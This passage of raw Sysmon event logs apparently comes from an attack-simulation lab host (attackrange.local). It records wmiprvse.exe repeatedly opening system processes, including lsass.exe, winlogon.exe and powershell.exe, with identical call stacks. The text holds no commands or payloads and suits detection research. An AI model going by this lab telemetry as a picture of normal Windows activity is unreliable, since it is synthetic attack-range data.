16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246967Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246966Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246965Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246964Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246963Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246962Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246961Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246960Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246959Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246958Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246957Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246956Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246955Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246954Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246953Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002246952Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.608{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C298356E7A838D74B96C1CC1BB0A12B,SHA256=4148D11857C2DE48B9CB99AB8F28D7697A56199D16D9B0AC3C4006A99A69A1F6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002246951Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.588{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246950Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.588{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246949Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.588{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246948Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.588{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.